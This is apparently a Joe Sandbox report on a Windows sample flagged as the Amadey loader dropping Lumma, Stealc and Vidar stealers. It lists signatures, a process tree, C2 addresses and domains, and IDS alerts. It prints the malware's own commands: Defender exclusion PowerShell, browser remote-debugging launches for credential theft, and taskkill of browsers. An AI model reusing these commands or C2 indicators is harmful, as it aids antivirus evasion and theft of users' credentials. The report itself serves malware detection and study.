Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
file.exe

Overview

General Information

Sample name:file.exe
Analysis ID:1579352
MD5:aefbd9e285960b704524b4c33b0c9567
SHA1:688eb719525b89f93db7d22bcbae38a13e7a973b
SHA256:bc240f565f4a4aab03cdf04b6ae4522179347145e338ef33df918e741afc5ebb
Tags:exeuser-Bitsight
Infos:

Detection

LummaC, Amadey, Credential Flusher, LummaC Stealer, Stealc, Vidar
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for dropped file
Attempt to bypass Chrome Application-Bound Encryption
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Amadeys Clipper DLL
Yara detected Amadeys stealer DLL
Yara detected Credential Flusher
Yara detected LummaC Stealer
Yara detected Powershell download and execute
Yara detected Stealc
Yara detected Vidar stealer
AI detected suspicious sample
Adds a directory exclusion to Windows Defender
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Contains functionality to inject code into remote processes
Creates multiple autostart registry keys
Disable Windows Defender notifications (registry)
Disable Windows Defender real time protection (registry)
Disables Windows Defender Tamper protection
Drops PE files to the document folder of the user
Drops large PE files
Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Injects a PE file into a foreign processes
Leaks process information
Loading BitLocker PowerShell Module
LummaC encrypted strings found
Machine Learning detection for dropped file
Machine Learning detection for sample
Modifies windows update settings
PE file contains section with special chars
PE file has a writeable .text section
Query firmware table information (likely to detect VMs)
Sample uses string decryption to hide its real strings
Sigma detected: New RUN Key Pointing to Suspicious Folder
Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Tries to harvest and steal Bitcoin Wallet information
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Crypto Currency Wallets
Tries to steal Mail credentials (via file / registry access)
AV process strings found (often used to terminate AV products)
Allocates memory with a write watch (potentially for evading sandboxes)
Binary contains a suspicious time stamp
Checks for debuggers (devices)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates files inside the system directory
Creates job files (autostart)
Detected potential crypto function
Downloads executable code via HTTP
Drops PE files
Drops PE files to the application program directory (C:\ProgramData)
Drops files with a non-matching file extension (content does not match file extension)
Enables debug privileges
Entry point lies outside standard sections
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found dropped PE file which has not been started or loaded
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
PE file contains an invalid checksum
PE file contains sections with non-standard names
Queries disk information (often used to detect virtual machines)
Queries information about the installed CPU (vendor, model number etc)
Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Searches for user specific document files
Shows file infection / information gathering behavior (enumerates multiple directory for files)
Sigma detected: Browser Started with Remote Debugging
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: Powershell Defender Exclusion
Sleep loop found (likely to delay execution)
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Uses taskkill to terminate processes
Yara detected Credential Stealer

Classification

  • System is w10x64
  • file.exe (PID: 7488 cmdline: "C:\Users\user\Desktop\file.exe" MD5: AEFBD9E285960B704524B4C33B0C9567)
    • skotes.exe (PID: 7648 cmdline: "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe" MD5: AEFBD9E285960B704524B4C33B0C9567)
  • skotes.exe (PID: 7788 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: AEFBD9E285960B704524B4C33B0C9567)
  • skotes.exe (PID: 1740 cmdline: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe MD5: AEFBD9E285960B704524B4C33B0C9567)
    • a2870b1ac5.exe (PID: 7368 cmdline: "C:\Users\user\AppData\Local\Temp\1019663001\a2870b1ac5.exe" MD5: 87330F1877C33A5A6203C49075223B16)
    • 85746525a0.exe (PID: 7572 cmdline: "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
      • conhost.exe (PID: 7580 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • 85746525a0.exe (PID: 7908 cmdline: "C:\Users\user\AppData\Local\Temp\1019664001\85746525a0.exe" MD5: AFD936E441BF5CBDB858E96833CC6ED3)
    • 81d22383f9.exe (PID: 7712 cmdline: "C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe" MD5: 04F57C6FB2B2CD8DCC4B38E4A93D4366)
      • conhost.exe (PID: 7720 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 7648 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 7796 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • powershell.exe (PID: 5312 cmdline: "powershell.exe" Add-MpPreference -ExclusionPath "C:\ProgramData" MD5: C32CA4ACFCC635EC1EA6ED8A34DF5FAC)
        • conhost.exe (PID: 3020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • bb31c9d4a53941b6b913f33980d23feb.exe (PID: 2792 cmdline: "C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe" MD5: CC36E2A5A3C64941A79C31CA320E9797)
        • chrome.exe (PID: 8004 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
          • chrome.exe (PID: 7888 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2312 --field-trial-handle=2072,i,2373336056486435438,11237397137693993043,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • 932bb971c3.exe (PID: 5496 cmdline: "C:\Users\user\AppData\Local\Temp\1019668001\932bb971c3.exe" MD5: 0FF2001AEABB55D9AC0BFEB28C577633)
      • firefox.exe (PID: 7580 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking --attempting-deelevation MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
        • firefox.exe (PID: 2816 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
          • firefox.exe (PID: 2164 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" -contentproc --channel=2292 -parentBuildID 20230927232528 -prefsHandle 2212 -prefMapHandle 2196 -prefsLen 25359 -prefMapSize 237879 -win32kLockedDown -appDir "C:\Program Files\Mozilla Firefox\browser" - {7ce4f639-b801-4da5-9524-7365bf392772} 2816 "\\.\pipe\gecko-crash-server-pipe.2816" 223fe469310 socket MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • chrome.exe (PID: 7580 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9222 --profile-directory="Default" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • c9692f9101.exe (PID: 7124 cmdline: "C:\Users\user\AppData\Local\Temp\1019669001\c9692f9101.exe" MD5: 87448823DAB50A9EDD9F481B99ACA4EE)
    • ed7d415177.exe (PID: 944 cmdline: "C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe" MD5: 1C76387D2784B116B9F532B8B0A48C8B)
    • d0e32932f8.exe (PID: 6672 cmdline: "C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe" MD5: 5F8D93018394ECD9F599AA2C10147A5F)
      • chrome.exe (PID: 7320 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9229 --profile-directory="" MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
        • chrome.exe (PID: 5784 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2284 --field-trial-handle=2204,i,16921492917580984058,10404394460730179528,262144 /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
    • bc893816fa.exe (PID: 3400 cmdline: "C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe" MD5: C62F6307B430705A222D91251C64A3FD)
      • taskkill.exe (PID: 5100 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 4456 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7204 cmdline: taskkill /F /IM chrome.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7200 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5648 cmdline: taskkill /F /IM msedge.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 3600 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 5100 cmdline: taskkill /F /IM opera.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7744 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • taskkill.exe (PID: 7864 cmdline: taskkill /F /IM brave.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 8068 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
      • firefox.exe (PID: 7268 cmdline: "C:\Program Files\Mozilla Firefox\firefox.exe" --kiosk "https://youtube.com/account?=https://accounts.google.com/v3/signin/challenge/pwd" --no-default-browser-check --disable-popup-blocking MD5: C86B1BE9ED6496FE0E0CBE73F81D8045)
      • taskkill.exe (PID: 3344 cmdline: taskkill /F /IM firefox.exe /T MD5: CA313FD7E6C2A778FFD21CFB5C1C56CD)
        • conhost.exe (PID: 7952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
    • 6f3b41816f.exe (PID: 6328 cmdline: "C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe" MD5: C682C12739CBB53B85334E649CF0B772)
    • fdd59fd4bc.exe (PID: 1120 cmdline: "C:\Users\user\AppData\Local\Temp\1019674001\fdd59fd4bc.exe" MD5: 3A425626CBD40345F5B8DDDD6B2B9EFA)
      • cmd.exe (PID: 5996 cmdline: C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Local\Temp\main\main.bat" /S" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)
        • conhost.exe (PID: 1020 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
        • mode.com (PID: 5776 cmdline: mode 65,10 MD5: BEA7464830980BF7C0490307DB4FC875)
    • 74b92d58dc.exe (PID: 692 cmdline: "C:\Users\user\AppData\Local\Temp\1019675001\74b92d58dc.exe" MD5: 15709EBA2AFAF7CC0A86CE0ABF8E53F1)
  • svchost.exe (PID: 5376 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)
  • ed7d415177.exe (PID: 280 cmdline: "C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe" MD5: 1C76387D2784B116B9F532B8B0A48C8B)
  • d0e32932f8.exe (PID: 7728 cmdline: "C:\Users\user\AppData\Local\Temp\1019671001\d0e32932f8.exe" MD5: 5F8D93018394ECD9F599AA2C10147A5F)
  • bc893816fa.exe (PID: 7972 cmdline: "C:\Users\user\AppData\Local\Temp\1019672001\bc893816fa.exe" MD5: C62F6307B430705A222D91251C64A3FD)
  • 6f3b41816f.exe (PID: 3716 cmdline: "C:\Users\user\AppData\Local\Temp\1019673001\6f3b41816f.exe" MD5: C682C12739CBB53B85334E649CF0B772)
  • cleanup
NameDescriptionAttributionBlogpost URLsLink
Lumma Stealer, LummaC2 StealerLumma Stealer (aka LummaC2 Stealer) is an information stealer written in C language that has been available through a Malware-as-a-Service (MaaS) model on Russian-speaking forums since at least August 2022. It is believed to have been developed by the threat actor "Shamel", who goes by the alias "Lumma". Lumma Stealer primarily targets cryptocurrency wallets and two-factor authentication (2FA) browser extensions, before ultimately stealing sensitive information from the victim's machine. Once the targeted data is obtained, it is exfiltrated to a C2 server via HTTP POST requests using the user agent "TeslaBrowser/5.5"." The stealer also features a non-resident loader that is capable of delivering additional payloads via EXE, DLL, and PowerShell.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.lumma
NameDescriptionAttributionBlogpost URLsLink
AmadeyAmadey is a botnet that appeared around October 2018 and is being sold for about $500 on Russian-speaking hacking forums. It periodically sends information about the system and installed AV software to its C2 server and polls to receive orders from it. Its main functionality is that it can load other payloads (called "tasks") for all or specifically targeted computers compromised by the malware.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.amadey
NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
NameDescriptionAttributionBlogpost URLsLink
VidarVidar is a forked malware based on Arkei. It seems this stealer is one of the first that is grabbing information on 2FA Software and Tor Browser.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.vidar
{"C2 url": "http://185.215.113.206/c4becf79229cb002.php"}
{"C2 url": ["sustainskelet.lat", "grannyejh.lat", "crosshuaht.lat", "rapeflowwj.lat", "necklacebudi.lat", "energyaffai.lat", "pancakedipyps.click", "aspecteirs.lat", "discokeyus.lat"], "Build id": "FATE99--test"}
{"C2 url": "http://www.microsoft.com0", "Botnet": "1402"}
{"C2 url": "185.215.113.43/Zu7JuNko/index.php", "Version": "4.42", "Install Folder": "abc3bc1985", "Install File": "skotes.exe"}
SourceRuleDescriptionAuthorStrings
sslproxydump.pcapJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
    sslproxydump.pcapJoeSecurity_LummaCStealer_3Yara detected LummaC StealerJoe Security
      sslproxydump.pcapJoeSecurity_LummaCStealer_2Yara detected LummaC StealerJoe Security
        SourceRuleDescriptionAuthorStrings
        C:\Users\user\AppData\Local\Temp\1019676001\6cc6a39605.exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
          C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\random[4].exeJoeSecurity_Amadey_3Yara detected Amadey\'s Clipper DLLJoe Security
            SourceRuleDescriptionAuthorStrings
            00000018.00000003.3232038991.0000000000938000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
              0000000B.00000003.2841686209.0000000000B7E000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                0000001E.00000003.3529309223.000000000177D000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                  0000001E.00000003.3526536288.00000000017D6000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                    0000000B.00000003.2795246224.0000000000BDE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_CredentialStealerYara detected Credential StealerJoe Security
                      Click to see the 36 entries
                      SourceRuleDescriptionAuthorStrings
                      21.0.bb31c9d4a53941b6b913f33980d23feb.exe.400000.0.unpackJoeSecurity_Vidar_1Yara detected Vidar stealerJoe Security
                        0.2.file.exe.bc0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                          1.2.skotes.exe.ea0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security
                            2.2.skotes.exe.ea0000.0.unpackJoeSecurity_Amadey_2Yara detected Amadey\'s stealer DLLJoe Security

                              System Summary

                              barindex
                              Source: Registry Key setAuthor: Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing: Data: Details: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1740, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed7d415177.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe, ParentProcessId: 7712, ParentProcessName: 81d22383f9.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", ProcessId: 7648, ProcessName: powershell.exe
                              Source: Process startedAuthor: pH-T (Nextron Systems), Nasreddine Bencherchali (Nextron Systems): Data: Command: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", CommandLine|base64offset|contains: ^", Image: C:\Program Files\Google\Chrome\Application\chrome.exe, NewProcessName: C:\Program Files\Google\Chrome\Application\chrome.exe, OriginalFileName: C:\Program Files\Google\Chrome\Application\chrome.exe, ParentCommandLine: "C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe" , ParentImage: C:\agfznulwo\bb31c9d4a53941b6b913f33980d23feb.exe, ParentProcessId: 2792, ParentProcessName: bb31c9d4a53941b6b913f33980d23feb.exe, ProcessCommandLine: "C:\Program Files\Google\Chrome\Application\chrome.exe" --remote-debugging-port=9223 --profile-directory="Default", ProcessId: 8004, ProcessName: chrome.exe
                              Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Local\Temp\1019670001\ed7d415177.exe, EventID: 13, EventType: SetValue, Image: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe, ProcessId: 1740, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\ed7d415177.exe
                              Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe, ParentProcessId: 7712, ParentProcessName: 81d22383f9.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", ProcessId: 7648, ProcessName: powershell.exe
                              Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", CommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", CommandLine|base64offset|contains: ~2yzw, Image: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\1019667001\81d22383f9.exe, ParentProcessId: 7712, ParentProcessName: 81d22383f9.exe, ProcessCommandLine: "powershell.exe" Add-MpPreference -ExclusionPath "C:\agfznulwo", ProcessId: 7648, ProcessName: powershell.exe
                              Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 620, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 5376, ProcessName: svchost.exe
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:26.797914+010020283713Unknown Traffic192.168.2.449794172.67.209.202443TCP
                              2024-12-21T22:16:28.848986+010020283713Unknown Traffic192.168.2.449795172.67.209.202443TCP
                              2024-12-21T22:16:31.771117+010020283713Unknown Traffic192.168.2.449798172.67.209.202443TCP
                              2024-12-21T22:16:34.300779+010020283713Unknown Traffic192.168.2.449799172.67.209.202443TCP
                              2024-12-21T22:16:46.381345+010020283713Unknown Traffic192.168.2.449805172.67.209.202443TCP
                              2024-12-21T22:16:52.252326+010020283713Unknown Traffic192.168.2.449811172.67.209.202443TCP
                              2024-12-21T22:17:03.292985+010020283713Unknown Traffic192.168.2.449823172.67.209.202443TCP
                              2024-12-21T22:17:08.377859+010020283713Unknown Traffic192.168.2.449830104.21.21.99443TCP
                              2024-12-21T22:17:10.580936+010020283713Unknown Traffic192.168.2.449834172.67.209.202443TCP
                              2024-12-21T22:17:11.127813+010020283713Unknown Traffic192.168.2.449836104.21.21.99443TCP
                              2024-12-21T22:17:22.719552+010020283713Unknown Traffic192.168.2.449861104.21.21.99443TCP
                              2024-12-21T22:17:24.221958+010020283713Unknown Traffic192.168.2.449864104.21.21.99443TCP
                              2024-12-21T22:17:26.221008+010020283713Unknown Traffic192.168.2.449867104.21.21.99443TCP
                              2024-12-21T22:17:26.381568+010020283713Unknown Traffic192.168.2.449868104.21.21.99443TCP
                              2024-12-21T22:17:35.345292+010020283713Unknown Traffic192.168.2.449880104.21.21.99443TCP
                              2024-12-21T22:17:38.312560+010020283713Unknown Traffic192.168.2.449879104.21.21.99443TCP
                              2024-12-21T22:17:40.863780+010020283713Unknown Traffic192.168.2.449894104.21.21.99443TCP
                              2024-12-21T22:17:48.628640+010020283713Unknown Traffic192.168.2.449902104.21.21.99443TCP
                              2024-12-21T22:17:54.976425+010020283713Unknown Traffic192.168.2.449911104.21.21.99443TCP
                              2024-12-21T22:17:57.375083+010020283713Unknown Traffic192.168.2.449915104.21.67.146443TCP
                              2024-12-21T22:17:59.914617+010020283713Unknown Traffic192.168.2.449922104.21.21.99443TCP
                              2024-12-21T22:18:00.679982+010020283713Unknown Traffic192.168.2.449927104.21.67.146443TCP
                              2024-12-21T22:18:02.026185+010020283713Unknown Traffic192.168.2.449928104.21.21.99443TCP
                              2024-12-21T22:18:05.654784+010020283713Unknown Traffic192.168.2.449942104.21.21.99443TCP
                              2024-12-21T22:18:06.241033+010020283713Unknown Traffic192.168.2.449944104.21.21.99443TCP
                              2024-12-21T22:18:08.233108+010020283713Unknown Traffic192.168.2.449949104.21.67.146443TCP
                              2024-12-21T22:18:10.903858+010020283713Unknown Traffic192.168.2.449953104.21.21.99443TCP
                              2024-12-21T22:18:11.107174+010020283713Unknown Traffic192.168.2.449954104.21.21.99443TCP
                              2024-12-21T22:18:11.982641+010020283713Unknown Traffic192.168.2.449956104.21.67.146443TCP
                              2024-12-21T22:18:12.741229+010020283713Unknown Traffic192.168.2.449957104.21.21.99443TCP
                              2024-12-21T22:18:13.599031+010020283713Unknown Traffic192.168.2.449959104.21.21.99443TCP
                              2024-12-21T22:18:16.371503+010020283713Unknown Traffic192.168.2.449962104.21.21.99443TCP
                              2024-12-21T22:18:17.278669+010020283713Unknown Traffic192.168.2.449964104.21.67.146443TCP
                              2024-12-21T22:18:20.332894+010020283713Unknown Traffic192.168.2.449969104.21.67.146443TCP
                              2024-12-21T22:18:26.142310+010020283713Unknown Traffic192.168.2.449984104.21.67.146443TCP
                              2024-12-21T22:18:27.886023+010020283713Unknown Traffic192.168.2.449987104.21.21.99443TCP
                              2024-12-21T22:18:29.418263+010020283713Unknown Traffic192.168.2.449990104.21.67.146443TCP
                              2024-12-21T22:18:30.983410+010020283713Unknown Traffic192.168.2.449995104.21.21.99443TCP
                              2024-12-21T22:18:32.431798+010020283713Unknown Traffic192.168.2.449999104.21.91.209443TCP
                              2024-12-21T22:18:34.491864+010020283713Unknown Traffic192.168.2.450006104.21.91.209443TCP
                              2024-12-21T22:18:35.113633+010020283713Unknown Traffic192.168.2.450007104.21.21.99443TCP
                              2024-12-21T22:18:39.217141+010020283713Unknown Traffic192.168.2.450020104.21.21.99443TCP
                              2024-12-21T22:18:40.383069+010020283713Unknown Traffic192.168.2.450034104.21.91.209443TCP
                              2024-12-21T22:18:42.759047+010020283713Unknown Traffic192.168.2.450051104.21.91.209443TCP
                              2024-12-21T22:18:45.427523+010020283713Unknown Traffic192.168.2.450055104.21.91.209443TCP
                              2024-12-21T22:18:48.031137+010020283713Unknown Traffic192.168.2.450059104.21.91.209443TCP
                              2024-12-21T22:19:02.629579+010020283713Unknown Traffic192.168.2.450066104.21.91.209443TCP
                              2024-12-21T22:19:05.798211+010020283713Unknown Traffic192.168.2.450068104.21.91.209443TCP
                              2024-12-21T22:19:09.966852+010020283713Unknown Traffic192.168.2.450079172.67.209.202443TCP
                              2024-12-21T22:19:12.881418+010020283713Unknown Traffic192.168.2.450082172.67.209.202443TCP
                              2024-12-21T22:19:19.434577+010020283713Unknown Traffic192.168.2.450091172.67.209.202443TCP
                              2024-12-21T22:19:22.134489+010020283713Unknown Traffic192.168.2.450094172.67.209.202443TCP
                              2024-12-21T22:19:24.699901+010020283713Unknown Traffic192.168.2.450096172.67.209.202443TCP
                              TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                              2024-12-21T22:16:27.556841+010020546531A Network Trojan was detected192.168.2.449794172.67.209.202443TCP
                              2024-12-21T22:16:29.653320+010020546531A Network Trojan was detected192.168.2.449795172.67.209.202443TCP
                              2024-12-21T22:17:09.450089+010020546531A Network Trojan was detected192.168.2.449830104.21.21.99443TCP
                              2024-12-21T22:17:11.230085+010020546531A Network Trojan was detected192.168.2.449834172.67.209.202443TCP
                              2024-12-21T22:17:11.891945+010020546531A Network Trojan was detected192.168.2.449836104.21.21.99443TCP
                              2024-12-21T22:17:25.107335+010020546531A Network Trojan was detected192.168.2.449864104.21.21.99443TCP
                              2024-12-21T22:17:31.312279+010020546531A Network Trojan was detected192.168.2.449868104.21.21.99443TCP
